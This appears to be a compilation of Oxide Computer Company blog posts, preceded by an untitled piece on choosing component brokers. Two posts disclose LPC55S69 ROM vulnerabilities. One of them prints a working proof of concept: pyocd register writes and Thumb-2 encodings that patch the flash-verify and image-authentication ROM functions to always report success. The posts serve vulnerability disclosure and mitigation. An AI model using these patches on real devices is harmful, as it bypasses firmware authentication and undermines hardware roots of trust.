After checking out many of the websites showing stock on the part you desperately need, you’re back to square one. You’ve realized you can’t possibly trust one of these unheard-of websites to provide an instrumental component in your product. You’ve spoken with the manufacturer and distributors and nothing is available, not even samples. What next? Give up? Tell your founders and investors the timeline is in jeopardy and all forward progress must come to a halt? None of those sound like great alternatives.

I’m blessed in that I have a history in the broker market from a previous job in the computer industry. I’ve been exposed to all sorts of people and stories, some that make you just shake your head in disbelief. I already have the handful of people I feel comfortable and enjoy working with. These are a few areas I look at when deciding to work with any broker.

  1. Certifications (ISO, OSHA, R2, eStewards, etc) – While these certifications are typically for manufacturers and / or refurbishers, it gives me a sense of comfort in knowing that a company has achieved any of these certifications. Can a certification be “bought”? Sure, though no one involved would admit it. Don’t make this your only deciding factor but do take it into account. Physical site visits can help clarify any outstanding questions.

  2. Length of Time in Business – The good ones survive the times. Some not-so-great ones survive as well. Some new ones have yet to make a name for themselves but may be great options and provide amazing customer service. Or, they may cut corners to try and increase the bottom line. Do your research and talk to respected members of the secondary market community.

  3. Reputation – Not everyone will agree on a binary assignment of “good” or “bad” for a company. Again, speak with people in the industry about the company, its leadership, and its employees. Do your research on how the company started, how they’ve grown and changed over time, employee turnover, focus for the future, etc.

  4. Component Testing – As we’ve seen, many companies say they do component testing to verify legitimacy of a part. Ask questions, ask to see sample reports, inquire where they do their testing (in-house, 3rd party), etc. You may even consider asking if you can be present during the testing. You can learn a lot from how that question is answered, even if you don’t plan on actually being present.

  5. Warranty – Do they offer the same level of warranty as the manufacturer? What is covered by the warranty? How are warranty claims made?

  6. Trust – Trust the people you’re going to be working with and choose people you’re going to enjoy working with. There are a lot of good brokers out there, so you do have options. Find one you sync with, and the relationship will be off to a positive start.

In the end, choosing a broker to work with is both a tactical and personal choice. We don’t often get to choose who we work with, but when presented with an opportunity to do so, make sure you choose wisely. The quality and security of your product depend on it, and oftentimes, so does your sanity.

Benefits as a Reflection of Values Oxide Computer Company Blog

“We offer the best health insurance we could find” is what we promise in our job postings. On paper, this is accurate: the health insurance Oxide offers is the best plan we can find that is offered to small businesses.

What we left unsaid until now is that the best health insurance offered to small businesses is, in fact, not very good at all if you don’t neatly fit into a narrow demographic; the bitter irony is that the US healthcare system isn’t designed for those of us who rely on it the most. And life-saving treatments that aren’t needed by able-bodied cisgender people are, more often than not, deemed “not medically necessary” in off-the-shelf insurance policies simply because there is no law to require their coverage. In our society’s bizarre and accidental system, we rely on employers to provide benefits everyone should have, including healthcare, retirement plans, and dependent care.

When I came out as trans and started seeking medical care, I worked at a large employer that directly paid for the medical costs of its employees and dictated how their insurance networks process claims. I had the benefits I needed because other trans people fought for them and the company could unilaterally choose to provide them. Startups don’t have this luxury and are at the whims of insurance companies to keep the cost of hiring and retaining employees manageable. Meanwhile, insurers put profit over care, and won’t budge on off-the-shelf benefits plans unless Congress forces the issue – yet as I write this, lawmakers across the country are either ignoring us or actively stripping away our right to get the healthcare we need, so we’re not holding our breath.

With this in mind, I was initially uneasy about applying to Oxide because we didn’t make our benefits clear to prospective applicants. But I still applied — not out of blind faith, but because I felt a company built on these values would put its people first and work to provide what I needed. Shortly after I started, despite insurance companies not budging even an inch, our CEO Steve announced a reimbursement arrangement that would cover $10,000 of out-of-pocket healthcare expenses for gender-related healthcare per year. This isn’t perfect, but it’s a damn good start.

Future applicants shouldn’t need to put this much faith in us upholding our values in order to be comfortable about applying, though. Here’s a much clearer summary of our benefits:

  • We offer the best medical, dental, and vision insurance plans we can find as a small employer; premiums are 100% paid by Oxide for both employees and dependents.

  • We offer an optional FSA plan for out-of-pocket healthcare and dependent care expenses.

  • We reimburse (through an HRA) up to $17,000 annually: $10,000 annually for gender affirmation or infertility expenses, $5,000 annually for hearing and laser eye surgery expenses, and $2,000 annually for dental and miscellaneous healthcare expenses. The HRAs cover out-of-pocket expenses regardless of whether insurance covers them partially or not at all.

The bottom line: Where our insurers fall short, we will work to meet our employees where they need us to be.

As with our compensation model, the benefits we provide embody our mission, principles, and values: We can’t focus on our mission if we’re distracted by healthcare expenses. Our principles of integrity, honesty, and decency compel us to care for our teammates and their families. And our approach to benefits intersects with several of our values:

  • It is driven by our empathy. Even if we don’t have the context for someone else’s needs, we don’t need it: none of us ever want to have to worry about healthcare expenses for ourselves, our partners, or our families, and we wouldn’t wish it on each other. We understand that this approach is necessary and important, even if some of us don’t directly benefit.

  • It is a step toward building a more diverse team. In this regard, we are not meeting the same standard to which we hold ourselves with our other values. We strive to change that by embracing the needs of our current team as well as those of prospective future teammates. Benefits are a critical part of what employers bring to the table for candidates, and we don’t want to inhibit people from applying to Oxide because of the perception that small companies can only provide meager coverage that doesn’t work for them. While our compensation model ensures we have no pay gap, our approach ensures that people relying more on these vital benefits are still getting paid the same as their peers. Every member of the team has different needs, and we will do our best to address as many of them as we can.

  • It is a reflection of our resilience. We will do everything within our power to take care of our employees. We will continue to fight our insurers to provide for basic healthcare needs, and when they fall short, we will find other ways to provide for those needs (such as offering HRAs) while we continue to fight. We will never stop advocating for our employees.

  • It is a fundamental responsibility to our teammates. We don’t treat healthcare benefits as a “perk”: it is a basic need for all of us. And while it is tiring to continue to fight against an uncaring and unwavering healthcare system only to make incremental progress, we know that we must do so to keep our mission in sight.

Finally, in the spirit of transparency: we’ve made our benefits information public starting today. These are close to the same documents employees see when signing up for benefits (with some information only relevant for employees removed). We’re working to provide additional information for specific situations that we’re aware of — and we know that our benefits are not complete; there are innumerable needs none of us have experienced or thought of.

We share our benefits information for two important reasons: first, we want applicants to be able to learn everything we know about our benefits so that they feel confident in applying even in the face of a healthcare need that is not commonly covered; second, we want to give employees at other similarly-situated companies tools (such as suggesting HRAs) to help fight for the healthcare coverage they need. We have a responsibility to take care of our employees, but we also have a responsibility to make our industry a better place to work for everyone.

Another vulnerability in the LPC55S69 ROM Oxide Computer Company Blog

Here at Oxide, we continue to work on building servers as they should be. Last year, we discovered an undocumented hardware block in the LPC55S69 (our chosen part for our product’s Root of Trust implementation) that could be used to violate security boundaries. This issue highlighted the importance of transparency as an Oxide value which is why we are bringing another recently discovered vulnerability to light today. While continuing to develop our product, we discovered a buffer overflow in the ROM of the LPC55S69. This issue exists in the In-System Programming (ISP) code for the signed update mechanism which lives in ROM. This vulnerability allows an attacker to gain non-persistent code execution with a carefully crafted update regardless of whether the update is signed. This can be used to circumvent restrictions when the chip is fully locked down and also extract the device’s DICE Unique Device Secret (UDS). Because this issue exists in ROM there is no known workaround other than disabling all hardware and software paths to enter ISP mode. CVE-2022-22819 has been assigned for this vulnerability. Finding two separate issues in the same chip only strengthens Oxide’s assertion that keeping code proprietary does not improve product security and hardware manufacturers such as NXP should make their ROM source available for customer review.

Updates are hard

Before discussing the exploit, it’s worth thinking about the higher level problem: how do you update your software on a microcontroller once it leaves the factory? This turns out to be a tricky problem where a bug can result in a non-functional device. To make this problem easier, chip makers like NXP will provide some method to put the chip in a mode that allows for safe modification of flash independent of installed firmware. NXP offers this via its In System Programming (ISP) mode.

ISP mode allows a host (typically a general purpose computer) to read and write various parts of the chip including flash by sending commands to the target over a variety of protocols. The LPC55S69 supports receiving ISP commands over UART, SPI, I2C, and, on variants that include the necessary peripheral, CAN. The LPC55S69 can be configured to require code be signed with a specific key. In this configuration, most commands are restricted and changes to the flash can only come via the receive-sb-file command.

The update format

The receive-sb-file ISP command uses the SB2 format. This format includes a header followed by a series of commands which can modify the flash or start code execution. Confidentiality and integrity of an update are provided by encrypting the commands with a key programmed at manufacturing time, inserting a secure digest of the commands in the update header, and finally signing the header. The C representation of the first part of the header looks like the following:

              struct sb2_header_t {
        uint32_t nonce[4];

        uint32_t reserved;
        uint8_t m_signature[4];
        uint8_t m_majorVersion;
        uint8_t m_minorVersion;

        uint16_t m_flags;
        uint32_t m_imageBlocks;
        uint32_t m_firstBootTagBlock;
        section_id_t m_firstBootableSectionID;

        uint32_t m_offsetToCertificateBlockInBytes;

        uint16_t m_headerBlocks;

        uint16_t m_keyBlobBlock;
        uint16_t m_keyBlobBlockCount;
        uint16_t m_maxSectionMacCount;
        uint8_t m_signature2[4];

        uint64_t m_timestamp;
        version_t m_productVersion;
        version_t m_componentVersion;
        uint32_t m_buildNumber;
        uint8_t m_padding1[4];

The bug

The SB2 update is parsed sequentially in 16-byte blocks. The header identifies some parts of the update by block number (e.g. block 0 is at byte offset 0, block 1 at byte offset 16 etc). The bug comes from improper bounds checking on the block numbers. The SB2 parser in ROM copies the header to a global buffer before checking the signature. Instead of stopping when the size of the header has been copied (a total of 8 blocks or 128 bytes), the parsing code copies up to m_keyBlobBlock number of blocks. In a correctly formatted header, m_keyBlobBlock will refer to the block number right after the header, but the code does not check the bounds on this. If m_keyBlobBlock is set to a much larger number the code will continue copying bytes beyond the end of the global buffer, a classic buffer overflow.


The full extent of this bug depends on system configuration with code execution possible in many circumstances. A simple version of this can allow for enabling SWD access (normally disabled during ISP mode) via jumping to existing code in ROM. A more sophisticated attack has been demonstrated as a proof-of-concept to provide arbitrary code execution. While code execution via this vulnerability does not directly provide persistence, attack code executes with the privileges of ISP mode and can thus modify flash contents. If this system is configured for secure boot and sealed via the Customer Manufacturing Programming Area (CMPA), modifications of code stored in flash will be detected on subsequent boots. Additionally, ISP mode executes while the DICE UDS (Unique Device Secret) is still accessible allowing for off-device derivation of keys based on the secret.


Because this is an issue in the ROM, the best mitigation without replacing the chip is to prevent access to the vulnerable SB2 parser. Disabling ISP mode and not using flash recovery mode will avoid exposure, although this does mean the chip user must come up with alternate designs for those use cases.

The NXP ROM also provides an API for applying an SB2 update directly from user code. Using this API in any form will still provide a potential path to expose the bug. Checking the signature on an update using another ROM API before calling the update API would provide verification than an update is from a trusted source. This is not the same thing as verifying that the update data is correct or not malicious. Signature verification does provide a potential mechanism for some degree of confidence if using the SB2 update mechanism cannot be avoided.


As exciting as it was to find this issue, it was also surprising given NXP’s previous statement that the ROM had been reviewed for vulnerabilities. While no review is guaranteed to find every issue, this issue once again highlights that a single report is no substitute for transparency. Oxide continues to assert that open firmware is necessary for building a more secure system. Transparency in what we are building and how we are building it will allow our customers to make a fully informed choice about what they are buying and how their system will work. We, once again, invite everyone to join us in making open firmware the industry baseline.



Oxide discovers vulnerability while attempting to understand SB2 update process


Oxide discloses vulnerability to NXP


NXP PSIRT acknowledges the report


NXP PSIRT acknowledges the vulnerability


NXP Discloses issues in a NXP Security Bulletin (NDA required) and confirms that a new ROM revision, and thus new part revisions, are required to correct the vulnerability in affected product lines.


Oxide discloses as CVE-2022-22819

Hubris and Humility Oxide Computer Company Blog

When we started Oxide, we knew we were going to take a fresh look at the entire system. We knew, for example, that we wanted to have a true hardware root of trust and that we wanted to revisit the traditional BMC. We knew, too, that we would have our own system software on each of these embedded systems, and assumed that we would use an existing open source operating system as a foundation. However, as we waded deeper into these embedded systems and especially their constraints of security and robustness we found that what we wanted out of the existing operating systems wasn’t necessarily what they offered (or even wanted to offer).

As time went on in early 2020 and we found ourselves increasingly forcing existing systems out of the comfort of their design centers, we wondered: was our assumption of using an existing system wrong? Should we in fact be exploring our own de novo operating system? In particular, our colleague Cliff Biffle, who had a ton of experience with both Rust and embedded systems, had a vision for what such a system might look like (namely, the system that he had always wanted for himself!). Cliff dove into a sketch of his ideas, giving the nascent system a name that felt perfectly apt: Hubris.

After just a few weeks, Cliff’s ideas were taking concrete shape, and it was clear that there was a lot to like: the emerging Hubris was an all-Rust system that was not distracting itself by accommodating other runtimes; it was microkernel-based, allowing for safety and isolation; it employed a strictly synchronous task model, allowing for it be easily developed and comprehended; and it was small and light, allowing it to fit into some of the tight spots we envisioned for it. But for me, it was the way Cliff thought about the building of the system that really set Hubris apart: instead of having an operating system that knows how to dynamically create tasks at run-time (itself a hallmark of multiprogrammed, general purpose systems), Cliff had designed Hubris to fully specify the tasks for a particular application at build time, with the build system then combining the kernel with the selected tasks to yield a single (attestable!) image.

This is the best of both worlds: it is at once dynamic and general purpose with respect to what the system can run, but also entirely static in terms of the binary payload of a particular application — and broadly static in terms of its execution. Dynamic resource exhaustion is the root of many problems in embedded systems; having the system know a priori all of the tasks that it will ever see liberates it from not just a major source of dynamic allocation, but also from the concomitant failure modes. For example, in Hubris, tasks can always be safely restarted, because we know that the resources associated with a task are available if that task itself has faulted! And this eliminates failure modes in which dynamic task creation in response to load induces resource exhaustion; as Cliff has quipped, it is hard to have a fork bomb when the system lacks fork itself!

Precedence for the Hubris approach can be found in other systems like library operating systems, but there is an essential difference: Hubris is a memory-protected system, with tasks, the kernel, and drivers all in disjoint protection domains. (And yes, even in memory safe languages like Rust, memory protection is essential!) In this regard, Hubris represents what we like about Rust, too: a creative solution that cuts through a false dichotomy to yield a system that is at once nimble and rigorous.

It was clear that Cliff was on the right track with Hubris, and the rest of us jumped in with gusto. For my own part, with debugging and debuggability deep in my marrow, I set to work writing the debugger that I felt that we would need — and that Hubris deserved. Following Cliff’s lead, I dubbed it Humility, and it’s been exciting for me to see the debugger and the operating system work together to yield a higher-quality system.

We have known for quite some time that we would open source Hubris: not only is open source core to our own commercial thesis at Oxide, we also believe that the open source revolution — and its many advantages for customers — are long overdue in the lowest layers of the software stack. So we were waiting for the right occasion, and the Open Source Firmware Conference afforded us an excellent one: if you are a listener of our On the Metal podcast, you heard us talk about OSFC a bunch, and it felt entirely fitting that we would kickoff our own open source firmware contribution there. And while the conference starts today, the good news is that you haven’t missed anything! Or at least, not yet: the conference is virtual, so if you want to hear Cliff talk about Hubris in his own words — and it’s before 12:10 Pacific today — it’s not too late to buy a ticket! (The recording will naturally be released after the conference.)

And of course, if you just want to play with the system itself, Hubris and Humility are both now open source! Start by checking out the Hubris repo, the Hubris docs, and the Humility repo. (And if you are looking for a hardware vehicle for your exploration, take a look at the ST Nucleo-H753ZI evaluation board — a pretty capable computer for less than thirty bucks!) We believe Rust to be a part of the coming firmware revolution, and it’s exciting for us to have a system out there that embodies that belief!

Exploiting Undocumented Hardware Blocks in the LPC55S69 Oxide Computer Company Blog

At Oxide Computer, we are designing a new computer system from the ground up. Along the way we carefully review all hardware selected to ensure it meets not only functional needs but our security needs as well. This work includes reverse engineering where necessary to get a full understanding of the hardware. During the process of reverse engineering the NXP LPC55S69 ROM we discovered an undocumented hardware block intended to allow NXP to fix bugs discovered in the ROM by applying patches from on-device flash as part of the boot process. That’s important because this ROM contains the first instructions that are run on boot and stores a set of APIs that are called from user applications. Unfortunately, this undocumented block is left open and accessible by non-secure, unprivileged user code thus allowing attackers to make runtime modifications to purportedly trusted APIs, allowing them to potentially hijack future execution and subvert multiple security boundaries. This issue has been assigned CVE-2021-31532.

This vulnerability was found by pure chance. We believe that this issue would have been discovered much earlier if the source code for the ROM itself were publicly available. For us, finding and disclosing this issue has highlighted the importance of being able to audit the components in our system. Transparency is one of our values at Oxide because we believe that open systems are more likely to be secure ones.


The purpose of a secure boot process rooted in a hardware root of trust is to provide some level of assurance that the firmware and software booted on a server is unmodified and was produced by a trusted supplier. Using a root of trust in this way allows users to detect certain types of persistent attacks such as those that target firmware. Hardware platforms developed by cloud vendors contain a hardware root of trust, such as Google’s Titan, Microsoft’s Cerberus, and AWS’s Nitro. For Oxide’s rack, we evaluated the NXP LPC55S69 as a candidate for our hardware root of trust.

Part of evaluating a hardware device for use as a root of trust is reviewing how trust and integrity of code and data is maintained during the boot process. A common technique for establishing trust is to put the first instruction in an on-die ROM. If this is an actual mask ROM the code is permanently encoded in the hardware and cannot be changed. This is great for our chain of trust as we can have confidence that the first code executed will be what we expect and we can use that as the basis for validating other parts of the system. A downside to this approach is that any bugs discovered in the ROM cannot be fixed in existing devices. Allowing modification of read-only code has been associated with exploits in other generations of chips.

An appealing feature of the LPC55 is the addition of TrustZone-M. TrustZone-M provides hardware-enforced isolation allowing sensitive firmware and data to be protected from attacks against the rest of the system. Unlike TrustZone-A which uses thread context and memory mappings to distinguish between secure and non-secure worlds, TrustZone-M relies on designating parts of the physical address space as either secure or non-secure. Because of this, any hardware block that supports remapping of memory regions or that is shared between secure and non-secure worlds can potentially break that isolation. ARM recognized this risk and explicitly prohibited including their own Flash Patch and Breakpoint (FPB) unit, a hardware block commonly included in Cortex-M devices to improve debugging, in devices with TrustZone-M.

While doing our due diligence in reviewing the part, we discovered a custom undocumented hardware block by NXP that is similar to the ARM FPB but for patching ROM. While this ROM patcher is useful for fixing bugs discovered in the ROM after chip fabrication, it potentially weakens trusted boot assertions, as there is no longer a 100% guarantee that the same code is running each time the system boots. Thankfully, experimentation revealed that ROM patches are cleared upon device reset thus preventing any viable attacks against secure boot.

NXP also has a set of runtime APIs in ROM for accessing the on-board flash, authenticating firmware images, and entering in-system programming mode. These ROM APIs are expected to be called from secure mode and some, such as skboot_authenticate, require privileged mode as well. Since the ROM patcher is accessible from non-secure/unprivileged mode, an attacker can leverage these ROM APIs to gain privilege escalation by modifying the ROM API as follows:

  1. Pick a target ROM API (say flash_program) likely to be used by a secure mode application

  2. Use the ROM patcher to change the first instruction to branch to an attacker controlled address

  3. The next call into the ROM will execute the selected address

This issue can be mitigated through use of the memory protection unit (MPU) or security attribution unit (SAU) which restricts access to specified address ranges. Not all code bases will choose to enable the MPU, however. Developers may consider this unnecessary overhead given the expected small footprint of a microcontroller. This issue shows why that’s a dangerous assumption. Even close examination of the official documentation would not have given any indication of a reason to use the MPU. Multiple layers of security can mitigate or lessen the effects of a security issue.

How did we find this

Part of building a secure product means knowing exactly what code is running and what that code is doing. While having first instruction code in ROM is good for measured boot (we can know what code is running), the ROM itself is completely undocumented by NXP except for API entry points. This means we had no idea exactly what code was running or if that code was correct. Running undocumented code isn’t a value-add no matter how optimized or clever that code might be. We took some time to reverse engineer the ROM to get a better idea of how exactly the secure boot functionality worked and verify exactly what it was doing.

Reverse engineering is a very specialized field but it turns out you can get a decent idea of what code is doing with Ghidra and a knowledge of ARM assembly. It also helps that the ROM code was not intentionally obfuscated so Ghidra did a decent job of turning it back into C. Using the breadcrumbs available to us in NXP’s documentation we discovered an undocumented piece of hardware related to a “ROM patch” stored in on-chip persistent storage and we dug in to understand how it works.

Details about the hardware block

NXP’s homegrown ROM patcher is a hardware block implemented as an APB peripheral at non-secure base address 0x4003e000 and secure base address 0x5003e000. It provides a mechanism for replacing up to 16 32-bit words in the ROM with either an explicit 32-bit value or a svc instruction. The svc instruction is typically used by unprivileged code to request privileged code to perform an operation on its behalf. As this provides a convenient mechanism for performing an indirect call, it is used to trampoline to a patch stored in SRAM when the patch is longer than a few words.

NXP patch layout
Figure 1. NXP patch layout

Persistent ROM patches stored in flash

NXP divides the flash up into two main parts: regular flash and protected flash. Regular flash is available to the device developer for all uses. The protected flash region holds data for device settings. NXP documents the user configurable parts of the protected flash region in detail. The documentation notes the existence of an NXP area which cannot be reprogrammed but gives limited information about what data exists in that area.

LPC55 flash layout
Figure 2. LPC55 flash layout

The limited documentation for the NXP area in protected flash refers to a ROM patch area. This contains a data structure for setting the ROM patcher at boot up. We’ve decoded the structure but some of the information may be incomplete. Each entry in the NXP ROM patch area is described by a structure. This is the rough structure we’ve reverse engineered:

              struct rom_patch_entry {
        u8 word_count;
        u8 relative_address;
        u8 command;
        u8 magic_marker; // Always ‘U’
        u32 offset_to_be_patched
        u8 instructions[];

There’s three different commands defined by NXP to program the ROM patcher: a group of single word changes, an svc change, and a patch to SRAM. For the single word, the addresses to be changed are written to the entry in the array at offset 0x100 along with their corresponding entries in the reverse array at 0xf0. The relative_address field seems to determine if the addresses are relative or absolute. All the patches on our system have only been a single address so the full use of relative_address may be slightly different. For an svc change, the address is written to the 0x100 array, and the instructions are copied to an offset in the SRAM region. The patch to SRAM doesn’t actually use the flash patcher but it adjusts values in the global state stored in the SRAM.

Using the ROM patcher

Let’s show a detailed example of using the ROM patcher to change a single 32-bit word. In general, assuming the ROM patcher block starts at address 0x5003e000 and using patch slot “n” to modify a target ROM address “A” to have value “V”, we would do the following:

  1. Set bit 29 at 0x5003e0f4 to turn off all patches

  2. Write our target address A to the address register at 0x5003e100 + 4*n

  3. Write our replacement value V to the value register at 0x5003e0f0 - 4*n

  4. Set bit n to the enable register at 0x5003e0fc

  5. Clear bit 29 and set bit n in 0x5003d0f4 to use the replacement value

To make this concrete, let’s modify ROM address 0x13001000 from its initial value of 0 to a new value 0xffffffff. We’ll use the first patch slot (bit 0 in 0xf4).

                  // Initial value at the address in ROM that we’re going to patch
pyocd> read32 0x13001000
13001000: 00000000 |….|

// Step 1: Turn off all patches
pyocd> write32 0x5003e0f4 0x20000000

// Step 2: Write the target address (0x13001000)
pyocd> write32 0x5003e100 0x13001000

// Step 3: Write the value we’re going to patch it with (0xffffffff)
pyocd> write32 0x5003e0f0 0xffffffff

// Step 4: Enable patch 0
pyocd> write32 0x5003e0fc 0x1

// Step 5: Turn on the ROM patch and set bit 0 to use replacement
pyocd> write32 0x5003e0f4 0x1

// Our replaced value
pyocd> read32 0x13001000

13001000: ffffffff |….|
NXP ROM patcher
Figure 3. NXP ROM patcher

We can use these same steps to modify the flash APIs. NXP provides a function to verify that bytes have been written correctly to flash:

                  status_t FLASH_VerifyProgram(flash_config_t *config, uint32_t start,
        uint32_t lengthInBytes,
        const uint32_t *expectedData,
        uint32_t *failedAddress,
        uint32_t *failedData);

The function itself lives at 0x130073f8 (This is after indirection via the official function call table)

                  pyocd> disas 0x130073f8 32
0x130073f8: 2de9f847 push.w {r3, r4, r5, r6, r7, r8, sb, sl, lr}
0x130073fc: 45f61817 movw r7, #0x5918
0x13007400: 8046 mov r8, r0
0x13007402: c1f20047 movt r7, #0x1400
0x13007406: 3868 ldr r0, [r7]
0x13007408: 5fea030a movs.w sl, r3
0x1300740c: 85b0 sub sp, #0x14
0x1300740e: 0490 str r0, [sp, #0x10]
0x13007410: 0c46 mov r4, r1
0x13007412: 08bf it eq
0x13007414: 0420 moveq r0, #4
0x13007416: 1546 mov r5, r2

We can modify this function to always return success. ARM THUMB2 uses r0 as the return register. 0 is the value for success so we need to generate a mov r0, #0instruction followed by a bx lr instruction to return. This ends up being 0x2000 for the mov r0, #0 and 0x4770 for bx lr. The first instruction at 0x130073f8 is conveniently 4 bytes so it’s easy to replace with a single ROM patch slot.

                  // Turn off the patcher
pyocd> write32 0x5003e0f4 0x20000000

// Write the target address
pyocd> write32 0x5003e100 0x130073f8

// Write the target value
pyocd> write32 0x5003e0f0 0x47702000

// Enable patch 0
pyocd> write32 0x5003e0fc 0x1

// Turn on the patcher and use replacement for patch 0
pyocd> write32 0x5003e0f4 0x1

// The first two instructions have been replaced
pyocd> disas 0x130073f8 32
0x130073f8: 0020 movs r0, #0
0x130073fa: 7047 bx lr
0x130073fc: 45f61817 movw r7, #0x5918
0x13007400: 8046 mov r8, r0
0x13007402: c1f20047 movt r7, #0x1400
0x13007406: 3868 ldr r0, [r7]
0x13007408: 5fea030a movs.w sl, r3
0x1300740c: 85b0 sub sp, #0x14
0x1300740e: 0490 str r0, [sp, #0x10]
0x13007410: 0c46 mov r4, r1
0x13007412: 08bf it eq
0x13007414: 0420 moveq r0, #4
0x13007416: 1546 mov r5, r2

So long as this patch is active, any call to FLASH_VerifyProgram will return success regardless of its contents.

NXP also provides a function to verify the authenticity of an image:

                  skboot_status_t skboot_authenticate(const uint8_t *imageStartAddr,
        secure_bool_t *isSignVerified)

In addition to returning a status code, the value stored in the second argument also contains a separate return value that must be checked. It does make the ROM patching code longer but not significantly so. The assembly we need is:

                  // Two instructions to load kSECURE_TRACKER_VERIFIED = 0x55aacc33U
movw r0, 0xcc33
movt r0, 0x55aa

// store kSECURE_TRACKER_VERIFIED to r1 aka isSignVerified
str r0, [r1]

// Two instructions to load kStatus_SKBOOT_Success = 0x5ac3c35a
movw r0, 0xc35a
movt r0, 0x5ac3

// return
bx lr

If you look at a sample disassembly, there’s a mixture of 16 and 32 bit instructions:

                  45c: f64c 4033 movw r0, #52275 ; 0xcc33
460: f2c5 50aa movt r0, #21930 ; 0x55aa
464: 6008 str r0, [r1, #0]
466: f24c 305a movw r0, #50010 ; 0xc35a
46a: f6c5 20c3 movt r0, #23235 ; 0x5ac3
46e: 4770 bx lr

Everything must be written in 32-bit words so the 16 bit instructions either get combined with bytes from another instruction or padded with nop. The start of the function is halfway on a word boundary (0x1300a34e) which needs to be padded:

                  pyocd> disas 0x1300a34c 32
0x1300a34c: 70bd pop {r4, r5, r6, pc}
0x1300a34e: 38b5 push {r3, r4, r5, lr}
0x1300a350: 0446 mov r4, r0
0x1300a352: 0d46 mov r5, r1
0x1300a354: fbf7e0f9 bl #0x13005718
0x1300a358: 0020 movs r0, #0
0x1300a35a: 00f048f9 bl #0x1300a5ee
0x1300a35e: 00b1 cbz r0, #0x1300a362
0x1300a360: 09e0 b #0x1300a376
0x1300a362: 0de0 b #0x1300a380
0x1300a364: 38b5 push {r3, r4, r5, lr}
0x1300a366: 0446 mov r4, r0
0x1300a368: 0d46 mov r5, r1
0x1300a36a: 0020 movs r0, #0

// Turn off the ROM patch
pyocd> write32 0x5003e0f4 0x20000000

// Write address and value 0
pyocd> write32 0x5003e100 0x1300a34c
pyocd> write32 0x5003e0f0 0xf64cbf00

// Write address and value 1
pyocd> write32 0x5003e104 0x1300a350
pyocd> write32 0x5003e0ec 0xf2c54033

// Write address and value 2
pyocd> write32 0x5003e108 0x1300a354
pyocd> write32 0x5003e0e8 0x600850aa

// Write address and value 3
pyocd> write32 0x5003e10c 0x1300a358
pyocd> write32 0x5003e0e4 0x305af24c

// Write address and value 4
pyocd> write32 0x5003e110 0x1300a35c
pyocd> write32 0x5003e0e0 0x20c3f6c5

// Write address and value 5
pyocd> write32 0x5003e114 0x1300a360
pyocd> write32 0x5003e0dc 0xbf004770

// Enable patches 0-5
pyocd> write32 0x5003e0f4 0x3f

// Turn on the ROM patcher and set patches 0-5 to single-word replacement mode.
pyocd> write32 0x5003e0f4 0x3f

// The next 7 instructions are the modifications
pyocd> disas 0x1300a34c 32
0x1300a34c: 00bf nop
0x1300a34e: 4cf63340 movw r0, #0xcc33
0x1300a352: c5f2aa50 movt r0, #0x55aa
0x1300a356: 0860 str r0, [r1]
0x1300a358: 4cf25a30 movw r0, #0xc35a
0x1300a35c: c5f6c320 movt r0, #0x5ac3
0x1300a360: 7047 bx lr
0x1300a362: 00bf nop
0x1300a364: 38b5 push {r3, r4, r5, lr}
0x1300a366: 0446 mov r4, r0
0x1300a368: 0d46 mov r5, r1
0x1300a36a: 0020 movs r0, #0

The authentication method now returns success for any address passed in.

The careful observer will note that the FLASH_VerifyProgram and skboot_authenticate patches use the same address slots and thus cannot be applied at the same time. We’re limited to eight 32-bit word changes or a total of 32 bytes which limits the number of locations that can be changed. The assembly demonstrated here is not optimized and could certainly be improved. Another approach is to apply one patch, wait for the function to be called and then switch to a different patch.

Applying Mitigations

A full mitigation would provide a lock-out option so that once the ROM patcher is enabled no further changes are available until the next reset. Based on discussions with NXP, this is not a feature that is available on the current hardware.

The LPC55 offers a standard memory protection unit (MPU). The MPU works on an allowed list of memory regions. If the MPU is configured without the ROM patcher in the allowed set, any access will trigger a fault. This makes it possible to prevent applications from using the ROM patcher at all.

The LPC55 also has a secure AHB bus matrix to provide another layer of protection. This is custom hardware to block access on both secure and privilege axes. Like the ROM patcher itself, the ability to block access to the ROM patcher is not documented even though it exists. The base address of the ROM patcher (0x5003e000) comes right after the last entry in the APB table (The PLU at 0x5003d000). The order of the bits in the secure AHB registers correspond to the order of blocks in the memory map, which means the bits corresponding to the ROM patcher come right after the PLU. SEC_CTRL_APB_BRIDGE1_MEM_CTRL3 is the register of interest and the bits to set for the ROM patch are 24 and 25.

NXP offers a family of products based on the LPC55 line. The LPC55S2x is notable for not including TrustZone-M. While at first glance, this may seem to imply it is immune to privilege escalation via ROM patches, LPC55S2x is still an ARMv8-M device with privileged/non-privileged modes which are just as vulnerable. The non-secure MPU is the only method of blocking non-privileged access to the ROM patcher on all LPC55 variants.


Nobody expects code to be perfect. Code for the mask ROM in particular may have to be completed well before other code given manufacturing requirements. Several of the ROM patches on the LPC55 were related to power settings which may not be finalized until very late in the product cycle. Features to fix bugs must not introduce vulnerabilities however! The LPC55S69 is marketed as a security product which makes the availability of the ROM patcher even riskier. The biggest takeaway from all of this is that transparency is important for security. A risk cannot be mitigated unless it is known. Had we not begun to ask deep questions about the ROM’s behavior, we would have been exposed to this vulnerability until it was eventually discovered and reported. Attempts to provide security through obscurity, such as preventing read access to ROMs or leaving hardware undocumented, have been repeatedly shown to be ineffective (https://blog.zapb.de/stm32f1-exceptional-failure/, http://dmitry.gr/index.php?r=05.Projects&proj=23. PSoC4) and merely prolong the exposure. Had NXP documented the ROM patch hardware block and provided ROM source code for auditing, the user community could have found this issue much earlier and without extensive reverse engineering effort.

NXP, however, does not agree; this is their position on the matter (which they have authorized us to share publicly):

Even though we are not believers of security-by-obscurity, keeping the interest of our wide customer base the product specific ROM code is not opened to external parties, except to NXP approved Common Criteria certified security test labs for vulnerability reviews.

At Oxide, we believe fervently in open firmware, at all layers of the stack. In this regard, we intend to be the model for what we wish to see in the world: by the time our Oxide racks are commercially available next year, you can expect that all of the software and firmware that we have written will be open source, available for view – and scrutiny! – by all. Moreover, we know that the arc of system software bends towards open source: we look forward to the day that NXP – and others in the industry who cling to their proprietary software as a means of security – join us with truly open firmware.



Oxide sends disclosure to NXP including an embargo of 90 days


NXP PSIRT Acknowledges disclosure


Oxide requests confirmation that vulnerability was able to be reproduced


NXP confirms vulnerability and is working on mitigation


Oxide requests an update on disclosure timeline


NXP requests clarification of vulnerability scope


Oxide provides responses and a more complete PoC


NXP requests 45 day embargo extension to April 30th, 2021


Oxide publicly discloses this vulnerability as CVE-2021-31532

Compensation as a Reflection of Values Oxide Computer Company Blog

